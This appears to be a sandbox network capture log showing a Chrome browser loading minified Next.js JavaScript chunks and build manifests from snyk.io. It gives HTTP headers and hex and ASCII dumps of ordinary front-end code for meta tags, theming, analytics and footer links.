                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC8980INData Raw: 74 6f 72 73 2e 6c 65 6e 67 74 68 26 26 65 2e 6f 70 65 6e 47 72 61 70 68 2e 76 69 64 65 6f 2e 61 63 74 6f 72 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 70 72 6f 66 69 6c 65 26 26 67 2e 70 75 73 68 28 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6d 65 74 61 22 2c 7b 6b 65 79 3a 22 76 69 64 65 6f 3a 61 63 74 6f 72 3a 30 22 2b 74 2c 70 72 6f 70 65 72 74 79 3a 22 76 69 64 65 6f 3a 61 63 74 6f 72 22 2c 63 6f 6e 74 65 6e 74 3a 65 2e 70 72 6f 66 69 6c 65 7d 29 29 2c 65 2e 72 6f 6c 65 26 26 67 2e 70 75 73 68 28 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6d 65 74 61 22 2c 7b 6b 65 79 3a 22 76 69 64 65 6f 3a 61 63 74 6f 72 3a 72 6f 6c 65 3a 30 22 2b 74 2c 70 72 6f 70 65 72 74 79 3a 22 76 69 64 65 6f 3a 61 63 74 6f 72
                                                                                                                                                                                                                                                                                                              Data Ascii: tors.length&&e.openGraph.video.actors.forEach(function(e,t){e.profile&&g.push(r.createElement("meta",{key:"video:actor:0"+t,property:"video:actor",content:e.profile})),e.role&&g.push(r.createElement("meta",{key:"video:actor:role:0"+t,property:"video:actor
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 7d 29 3b 6c 65 74 20 72 3d 7b 22 64 61 72 6b 2d 70 75 72 70 6c 65 22 3a 7b 62 67 3a 22 62 67 2d 62 61 73 65 2d 64 61 72 6b 2d 70 75 72 70 6c 65 22 2c 6d 69 6e 69 48 65 61 64 65 72 3a 22 64 61 72 6b 2d 70 75 72 70 6c 65 22 2c 66 69 6c 6c 3a 22 66 69 6c 6c 2d 62 61 73 65 2d 64 61 72 6b 2d 70 75 72 70 6c 65 22 2c 67 72 61 64 69 65 6e 74 3a 22 70 75 72 70 6c 65 2d 74 6f 2d 64 65 65 70 2d 73 65 61 22 2c 69 73 44 61 72 6b 3a 21 31 2c 62 6f 72 64 65 72 3a 22 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 64 61 72 6b 2d 70 75 72 70 6c 65 22 2c 77 61 76 65 3a 5b 22 62 67 2d 70 75 72 70 6c 65 2d 74 6f 2d
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{k:function(){return r},y:function(){return n}});let r={"dark-purple":{bg:"bg-base-dark-purple",miniHeader:"dark-purple",fill:"fill-base-dark-purple",gradient:"purple-to-deep-sea",isDark:!1,border:"border border-dark-purple",wave:["bg-purple-to-
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC8204INData Raw: 29 3d 3e 6e 75 6c 6c 21 3d 69 3f 69 28 29 2e 74 68 65 6e 28 6f 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6f 28 28 29 3d 3e 6e 75 6c 6c 29 29 7d 29 3a 28 64 65 6c 65 74 65 20 72 2e 77 65 62 70 61 63 6b 2c 64 65 6c 65 74 65 20 72 2e 6d 6f 64 75 6c 65 73 2c 73 28 61 2c 72 29 29 7d 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 26 26 6e 75 6c 6c 21 3d 3d 74 2e 64 65 66 61 75 6c 74 29 26 26 76 6f 69 64 20 30 3d 3d 3d 74 2e 64 65 66 61 75 6c 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 26 26 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2e 64 65 66 61 75 6c 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61
                                                                                                                                                                                                                                                                                                              Data Ascii: )=>null!=i?i().then(o):Promise.resolve(o(()=>null))}):(delete r.webpack,delete r.modules,s(a,r))}("function"==typeof t.default||"object"==typeof t.default&&null!==t.default)&&void 0===t.default.__esModule&&(Object.defineProperty(t.default,"__esModule",{va
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC3080INData Raw: 30 30 30 30 30 42 46 43 0d 0a 74 2e 69 6e 63 6c 75 64 65 73 28 61 29 29 72 65 74 75 72 6e 20 6c 28 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 28 29 3b 6c 65 74 20 65 3d 72 2e 64 65 66 61 75 6c 74 2e 75 73 65 43 6f 6e 74 65 78 74 28 6e 2e 4c 6f 61 64 61 62 6c 65 43 6f 6e 74 65 78 74 29 3b 65 26 26 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 2e 6d 6f 64 75 6c 65 73 29 26 26 61 2e 6d 6f 64 75 6c 65 73 2e 66 6f 72 45 61 63 68 28 74 3d 3e 7b 65 28 74 29 7d 29 7d 28 29 3b 6c 65 74 20 73 3d 72 2e 64 65 66 61 75 6c 74 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 28 6f 2e 73 75 62 73 63 72 69 62 65 2c 6f 2e 67 65 74 43 75 72 72 65 6e 74 56 61 6c 75 65 2c 6f 2e 67 65 74 43 75 72 72 65 6e 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000BFCt.includes(a))return l()})}function d(e,t){!function(){l();let e=r.default.useContext(n.LoadableContext);e&&Array.isArray(a.modules)&&a.modules.forEach(t=>{e(t)})}();let s=r.default.useSyncExternalStore(o.subscribe,o.getCurrentValue,o.getCurrent
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 64 2c 7b 2e 2e 2e 41 2c 63 74 61 5f 6e 61 6d 65 3a 22 22 3d 3d 3d 6f 3f 22 6c 6f 67 6f 2d 69 6d 61 67 65 22 3a 6f 2c 63 74 61 5f 74 79 70 65 3a 22 22 2e 63 6f 6e 63 61 74 28 21 50 7c 7c 4e 3f 22 49 6e 74 65 72 6e 61 6c 22 3a 22 4f 75 74 62 6f 75 6e 64 22 2c 22 5f 62 75 74 74 6f 6e 22 29 2c 6c 69 6e 6b 5f 75 72 6c 3a 6e 75 6c 6c 21 3d 50 3f 50 3a 76 6f 69 64 20 30 2c 6f 75 74 62 6f 75 6e 64 3a 21 50 7c 7c 4e 3f 30 3a 31 2c 63 61 74 65 67 6f 72 79 5f 6e 61 6d 65 3a 65 2c 73 75 62 63 61 74 65 67 6f 72 79 5f 6e 61 6d 65 3a 6e 2c 2e 2e 2e 63 2c 2e 2e 2e 53 7d 29 7d 72 65 74 75 72 6e 20 6b 26 26 6b 28 65 29 7d 2c 74 61 62 49 6e 64 65 78 3a 62 2c 73 74 79 6c 65 3a 63 2c 22 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 22 3a 22 42 75 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000d,{...A,cta_name:""===o?"logo-image":o,cta_type:"".concat(!P||N?"Internal":"Outbound","_button"),link_url:null!=P?P:void 0,outbound:!P||N?0:1,category_name:e,subcategory_name:n,...c,...S})}return k&&k(e)},tabIndex:b,style:c,"data-component":"But
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC12INData Raw: 62 65 72 2c 68 65 69 67 68 74 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ber,height
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3a 69 28 29 2e 6e 75 6d 62 65 72 2c 72 65 73 6f 75 72 63 65 54 79 70 65 3a 69 28 29 2e 73 74 72 69 6e 67 2c 76 69 64 65 6f 53 65 74 74 69 6e 67 73 3a 69 28 29 2e 73 68 61 70 65 28 7b 69 73 43 6f 6e 74 72 6f 6c 6c 65 64 3a 69 28 29 2e 62 6f 6f 6c 2c 61 75 74 6f 50 6c 61 79 3a 69 28 29 2e 62 6f 6f 6c 2c 69 73 4d 75 74 65 64 3a 69 28 29 2e 62 6f 6f 6c 7d 29 2c 68 61 73 43 6f 72 6e 65 72 52 61 64 69 75 73 3a 69 28 29 2e 62 6f 6f 6c 2c 68 61 73 53 68 61 64 6f 77 3a 69 28 29 2e 62 6f 6f 6c 7d 3b 76 61 72 20 67 3d 70 7d 2c 38 39 38 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 7d 29 3b 76 61 72 20
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000:i().number,resourceType:i().string,videoSettings:i().shape({isControlled:i().bool,autoPlay:i().bool,isMuted:i().bool}),hasCornerRadius:i().bool,hasShadow:i().bool};var g=p},89829:function(e,t,a){"use strict";a.d(t,{Z:function(){return _}});var
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC12INData Raw: 3d 28 6e 75 6c 6c 3d 3d 65 6b 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: =(null==ek
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 76 3d 65 6b 2e 66 69 65 6c 64 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 76 3f 76 6f 69 64 20 30 3a 76 2e 6c 61 6e 67 75 61 67 65 29 3f 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 75 6c 6c 3d 3d 65 6b 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 6d 3d 65 6b 2e 66 69 65 6c 64 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 76 6f 69 64 20 30 3a 6d 2e 6c 61 6e 67 75 61 67 65 29 3f 6e 75 6c 6c 3d 3d 65 6b 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 66 3d 65 6b 2e 66 69 65 6c 64 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 68 3d 66 2e 6c 61 6e 67 75 61 67 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 3f 76 6f 69 64 20 30 3a 68 2e 6a 6f 69 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000?void 0:null===(v=ek.fields)||void 0===v?void 0:v.language)?Array.isArray(null==ek?void 0:null===(m=ek.fields)||void 0===m?void 0:m.language)?null==ek?void 0:null===(f=ek.fields)||void 0===f?void 0:null===(h=f.language)||void 0===h?void 0:h.join


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              49192.168.2.54976923.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC375OUTGET /_next/static/chunks/2248-53c2c321360bf056.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="2248-53c2c321360bf056.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"3ed1acb02510bd2361181841d4e25001"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/2248-53c2c321360bf056.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::gtfxw-1729257049231-69284fc867c0
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:03 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 24677
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799343.1092e28
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC15651INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 32 34 38 5d 2c 7b 33 37 35 30 37 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6f 2c 65 29 7b 76 61 72 20 69 3d 7b 22 2e 2f 61 73 73 65 74 2d 68 79 70 65 72 6c 69 6e 6b 2e 6a 73 6f 6e 22 3a 32 35 39 39 34 2c 22 2e 2f 62 6c 6f 63 6b 71 75 6f 74 65 2e 6a 73 6f 6e 22 3a 36 32 35 35 39 2c 22 2e 2f 64 6f 63 75 6d 65 6e 74 2e 6a 73 6f 6e 22 3a 35 31 37 33 34 2c 22 2e 2f 65 6d 62 65 64 64 65 64 2d 61 73 73 65 74 2d 62 6c 6f 63 6b 2e 6a 73 6f 6e 22 3a 31 32 32 30 2c 22 2e 2f 65 6d 62 65 64 64 65 64 2d 65 6e 74 72 79 2d 62 6c 6f 63 6b 2e 6a 73 6f 6e 22 3a 37 32 32 35 38 2c 22 2e 2f 65 6d 62 65 64 64 65
                                                                                                                                                                                                                                                                                                              Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2248],{37507:function(l,o,e){var i={"./asset-hyperlink.json":25994,"./blockquote.json":62559,"./document.json":51734,"./embedded-asset-block.json":1220,"./embedded-entry-block.json":72258,"./embedde
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC8925INData Raw: 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6f 6f 74 65 72 2d 6c 65 67 61 6c 2d 6c 69 6e 6b 73 22 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 4c 65 67 61 6c 20 4c 69 6e 6b 73 22 2c 63 68 69 6c 64 72 65 6e 3a 6e 75 6c 6c 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 6d 61 70 28 6c 3d 3e 28 30 2c 69 2e 6a 73 78 29 28 22 6c 69 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 22 61 22 2c 7b 68 72 65 66 3a 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 75 72 6c 2c 63 68 69 6c 64 72 65 6e 3a 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 6c 61 62 65 6c 7d 29 7d 2c 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 6c 61 62 65 6c 29 29 7d 29 5d 7d 29 5d 7d 29 7d 29 7d 45 2e 70 72 6f 70 54 79 70 65 73 3d 7b 63 6f 6c 75 6d 6e 73 3a 73 28 29 2e 61
                                                                                                                                                                                                                                                                                                              Data Ascii: ,{className:"footer-legal-links","aria-label":"Legal Links",children:null==d?void 0:d.map(l=>(0,i.jsx)("li",{children:(0,i.jsx)("a",{href:null==l?void 0:l.url,children:null==l?void 0:l.label})},null==l?void 0:l.label))})]})]})})}E.propTypes={columns:s().a
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC101INData Raw: 5a 2c 7b 68 72 65 66 3a 28 30 2c 64 2e 5a 29 28 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 65 3d 6c 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 75 72 69 29 2c 63 68 69 6c 64 72 65 6e 3a 6f 7d 29 7d 7d 7d 3b 6f 2e 5a 3d 73 7d 7d 5d 29 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: Z,{href:(0,d.Z)(null==l?void 0:null===(e=l.data)||void 0===e?void 0:e.uri),children:o})}}};o.Z=s}}]);


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              50192.168.2.54977123.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC383OUTGET /_next/static/Cp4abAN54CGUdTYwS0J62/_buildManifest.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="_buildManifest.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"48ccb4d22af598db5f6d9a2c4497b92d"
                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 24 Oct 2024 14:26:39 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/Cp4abAN54CGUdTYwS0J62/_buildManifest.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::28rnl-1729780001167-68675a63b6fa
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:03 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 6607
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799343.1092eb8
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC6607INData Raw: 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 65 2c 61 2c 74 2c 63 2c 69 2c 70 2c 6c 2c 75 2c 72 29 7b 72 65 74 75 72 6e 7b 5f 5f 72 65 77 72 69 74 65 73 3a 7b 61 66 74 65 72 46 69 6c 65 73 3a 5b 5d 2c 62 65 66 6f 72 65 46 69 6c 65 73 3a 5b 5d 2c 66 61 6c 6c 62 61 63 6b 3a 5b 5d 7d 2c 22 2f 22 3a 5b 73 2c 65 2c 61 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 69 6e 64 65 78 2d 65 33 37 38 33 33 63 65 31 38 66 62 39 34 33 37 2e 6a 73 22 5d 2c 22 2f 34 30 34 22 3a 5b 73 2c 65 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 34 30 34 2d 38 65 37 32 31 61 33 38 61 64 35 63 34 32 66 36 2e 6a 73 22 5d 2c 22 2f 5f 65 72 72 6f 72 22 3a 5b 22 73 74 61 74 69 63 2f 63 68 75 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: self.__BUILD_MANIFEST=function(s,e,a,t,c,i,p,l,u,r){return{__rewrites:{afterFiles:[],beforeFiles:[],fallback:[]},"/":[s,e,a,"static/chunks/pages/index-e37833ce18fb9437.js"],"/404":[s,e,"static/chunks/pages/404-8e721a38ad5c42f6.js"],"/_error":["static/chun


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              51192.168.2.54977323.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC382OUTGET /_next/static/chunks/pages/index-e37833ce18fb9437.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:05 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="index-e37833ce18fb9437.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"bdc1b111b7e9cc4aea2860b03e1808d6"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:51 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/pages/index-e37833ce18fb9437.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::ltvgn-1729257060119-b4536b15da04
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:04 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 4856
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799344.10934fb
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:05 UTC4856INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 34 30 35 5d 2c 7b 34 35 37 32 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 69 29 7b 28 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 3d 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 22 2f 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 28 36 38 31 30 37 29 7d 5d 29 7d 2c 31 31 32 32 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6c 3d 69 28 38 35 38 39 33 29 2c 6f 3d 69 28 35 31 35 32 29 2c 64 3d 69 2e 6e 28 6f 29 2c 61 3d 69 28 34 35 36 39 37 29 2c 74 3d 69 2e 6e 28 61 29 2c 72
                                                                                                                                                                                                                                                                                                              Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{45728:function(e,n,i){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return i(68107)}])},11223:function(e,n,i){"use strict";var l=i(85893),o=i(5152),d=i.n(o),a=i(45697),t=i.n(a),r


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              52192.168.2.54977423.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:05 UTC381OUTGET /_next/static/Cp4abAN54CGUdTYwS0J62/_ssgManifest.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:05 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="_ssgManifest.js"
                                                                                                                                                                                                                                                                                                              Content-Length: 738
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: "8606dd534193a9c6f42925ceab334554"
                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 24 Oct 2024 14:26:41 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/Cp4abAN54CGUdTYwS0J62/_ssgManifest.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::q48gs-1729780001152-8c4ba5d0ba7f
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:05 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799345.10936da
